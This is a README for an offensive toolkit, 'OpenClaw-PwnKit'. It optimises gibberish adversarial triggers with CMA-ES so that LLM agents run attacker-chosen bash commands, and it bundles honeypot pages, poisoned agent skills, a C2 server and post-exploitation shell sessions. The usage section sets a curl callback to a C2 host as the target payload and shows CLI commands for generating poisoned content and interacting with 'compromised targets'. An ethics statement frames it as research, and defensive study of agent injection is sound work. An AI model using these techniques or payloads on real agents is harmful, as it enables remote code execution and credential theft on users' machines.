Black-Box Adversarial Attacks on LLM Agent Tool-Calling via CMA-ES
A research framework demonstrating that derivative-free optimization in token embedding space can bypass LLM safety alignment and achieve Remote Code Execution (RCE) through adversarial tool-call hijacking.
- Abstract
- Threat Model
- Method Overview
- Architecture
- Installation
- Configuration
- Usage
- Key Parameters
- Compute Requirements
- Ethics and Responsible Disclosure
- Citation
- License
As Large Language Models (LLMs) are increasingly augmented with tool-calling capabilities, LLM Agents are becoming the backbone of autonomous systems. However, RLHF-based safety alignment optimizes for semantic-level behavioral constraints but does not explicitly defend against adversarial perturbations in the continuous embedding space. This work exposes a critical security threat against closed-source frontier models (GPT-4, Claude 3, etc.): by injecting seemingly nonsensical adversarial triggers, an attacker can induce adversarial tool-call execution — forcing the agent to invoke system-level tools (e.g., bash) with attacker-controlled arguments, achieving Remote Code Execution (RCE) on the host machine.
Since closed-source models provide no gradient access, we formulate adversarial trigger generation as a derivative-free optimization problem over discrete token space. We propose a black-box attack framework based on CMA-ES (Covariance Matrix Adaptation Evolution Strategy) that leverages publicly available tokenizers to map discrete tokens into a continuous latent space for efficient search.
See the accompanying paper for full evaluation results, success rates, and defense analysis.
Adversarial Trigger (optimized gibberish)
│
▼
┌──────────┐ web/file/API ┌─────────────┐ tool call ┌──────────────┐
│ Attacker │ ──────────────────▶│ LLM Agent │ ──────────────▶│ Host System │
└──────────┘ injection via │ (GPT-4 etc) │ bash/exec │ (RCE target)│
honeypot/skill └─────────────┘ └──────────────┘
│
▼
C2 callback with
credentials & shell
Adversary capabilities:
- No access to model weights, gradients, or internal activations
- API-level query access only (chat completions with logprobs)
- Knowledge of the tokenizer vocabulary (publicly available for most frontier models)
Assumed target environment:
- The target is an LLM Agent with tool-calling capabilities (bash execution, web browsing, etc.)
- The agent processes external data (web pages, files, user-uploaded content) that may contain adversarial triggers
- The agent exposes a webhook or tool-invocation interface, as is common in agent frameworks (e.g., LangChain, AutoGPT). This toolkit specifically targets OpenClaw-based agents as the reference implementation
The core optimization pipeline operates as follows:
- Surrogate Embedding Extraction — Extract the token embedding matrix from an open-source surrogate model (Phi-2) to define a continuous search space
- PCA Dimensionality Reduction — Reduce the embedding dimensionality (2560d → 128d per token) via PCA to make CMA-ES tractable at scale
- sep-CMA-ES Optimization — Search over the PCA-reduced space using separable CMA-ES (
CMA_diagonal=True) with diagonal covariance for O(n) per-generation complexity - Soft-to-Hard Token Mapping — Map continuous vectors back to discrete tokens via FAISS
IndexFlatL2nearest-neighbor search in the full embedding space - Black-Box Fitness Evaluation — Query the target model API with a
bashtool definition and candidate triggers. Responses are scored via two paths: tool-call responses are evaluated by matching the invoked command against the target payload (keyword overlap + longest common substring); text-content responses are additionally scored using NLL loss from logprobs. The optimizer preferentially converges toward tool-call execution.
| Method | Module | Description |
|---|---|---|
| CMA-ES Trigger | attacks/method2_cma_es.py |
Gradient-free adversarial trigger optimization in embedding space |
| Naive Injection | attacks/method1_naive.py |
Baseline prompt injection via system-override preamble |
| Honeypot Delivery | attacks/method3_honeypot.py |
Hidden payload embedding in web pages for agent web-browsing scenarios |
| Skill Poisoning | attacks/method4_skills.py |
Malicious skill/plugin file generation targeting agent skill-loading mechanisms |
OpenClaw-PwnKit/
├── attacks/
│ ├── docs/
│ │ └── SOUL_PROMPT.py # Agent system prompt template (SOUL.md)
│ ├── method1_naive.py # Baseline prompt injection
│ ├── method2_cma_es.py # CMA-ES token optimizer (core contribution)
│ ├── method3_honeypot.py # Web honeypot payload delivery
│ └── method4_skills.py # Skill/plugin poisoning
├── core/
│ ├── c2_server.py # FastAPI C2 server (webhook receiver)
│ ├── agent_comm.py # Agent communication protocol
│ ├── bot_db.py # Shared bot database helpers
│ ├── virtual_os.py # Virtual filesystem state tracking
│ └── logger.py # Structured logging via loguru
├── meta/
│ └── title.png # Project banner image
├── bot_db.py # JSON-based bot database with thread-safe I/O
├── bot_manager.py # Post-exploitation session management
├── pwnkit_cli.py # Interactive CLI interface
├── config.yaml # Optimization & server configuration
├── LICENSE # GPL-3.0
└── requirements.txt # Python dependencies
git clone https://github.com/imbue-bit/OpenClaw-PwnKit.git
cd OpenClaw-PwnKit
python -m venv .venv && source .venv/bin/activate
pip install -r requirements.txtCore dependencies: PyTorch, Transformers, FAISS (faiss-cpu), CMA, scikit-learn, FastAPI, OpenAI SDK, Rich, tenacity, loguru.
Note: The surrogate model (microsoft/phi-2, ~5 GB) will be downloaded automatically on first run.
Edit config.yaml to set your environment:
c2_server:
public_url: "http://YOUR_PUBLIC_IP:8000"
openai:
api_key: "env" # reads from $OPENAI_API_KEY
optimization:
surrogate_model: "microsoft/phi-2"
trigger_length: 15
generations: 200
population_size: 64
pca_dimensions: 128
use_diagonal_cma: trueexport OPENAI_API_KEY="sk-..."
python pwnkit_cli.pyPwnKit > set_c2 http://your-server:8000
PwnKit > generate honeypot # generates poisoned web page
PwnKit > generate skill # generates poisoned agent skill
PwnKit > sessions # list compromised targets
PwnKit > interact <target_id> # interactive shell on target
from attacks.method2_cma_es import CMAESTokenOptimizer
optimizer = CMAESTokenOptimizer(
api_key="sk-...",
target_script="curl -X POST http://c2-server/hook",
trigger_len=15,
pca_dims=128,
)
# Runs sep-CMA-ES optimization (200 generations x 64 population)
adversarial_trigger = optimizer.optimize()
print(f"Optimized trigger: {adversarial_trigger}")| Parameter | Default | Description |
|---|---|---|
trigger_len |
10 | Number of tokens in the adversarial trigger sequence |
pca_dims |
128 | PCA reduction target (from model's hidden dim) |
max_generations |
200 | Maximum CMA-ES generations |
popsize |
64 | CMA-ES population size per generation |
sigma |
0.5 | Initial step-size for CMA-ES |
Note: The constructor defaults (e.g.,
trigger_len=10) may differ from theconfig.yamlrecommended values (e.g.,trigger_length: 15). When calling the API directly, pass parameters explicitly as shown in the example above.
A full optimization run with default parameters involves:
| Resource | Estimate |
|---|---|
| API calls | Up to 12,800 (200 generations × 64 population), reduced by fitness cache |
| API cost | ~$50–200 USD depending on cache hit rate (GPT-4 Turbo pricing) |
| GPU memory | ~8 GB recommended for Phi-2 surrogate model (fp16 weights + CUDA overhead) |
| Wall time | Several hours depending on API rate limits |
| Disk | ~10 GB for Phi-2 model weights (HuggingFace caches fp32 checkpoint) |
This tool is released strictly for academic research and authorized security testing.
OpenClaw-PwnKit is designed to advance the understanding of adversarial vulnerabilities in LLM Agent systems. All experiments were conducted in controlled, sandboxed environments against locally deployed agent instances. No production systems were targeted.
The goal is to inform the AI safety community and drive the development of robust defenses, including:
- Strict data-instruction separation at the architectural level
- Tool-call sandboxing and capability restriction
- Adversarial trigger detection in agent input pipelines
- Embedding-space anomaly monitoring
Findings have been disclosed to affected vendors prior to public release. Do not use this tool against systems without explicit authorization. The authors bear no responsibility for misuse.
@misc{openclawhacker2026,
author = {Chunjiang Intelligence},
title = {OpenClaw-PwnKit: Black-Box Adversarial Attacks on {LLM} Agent
Tool-Calling via {CMA-ES} in Token Embedding Space},
year = {2026},
note = {Preprint, under review},
url = {https://github.com/imbue-bit/OpenClaw-PwnKit}
}This project is licensed under the GNU General Public License v3.0.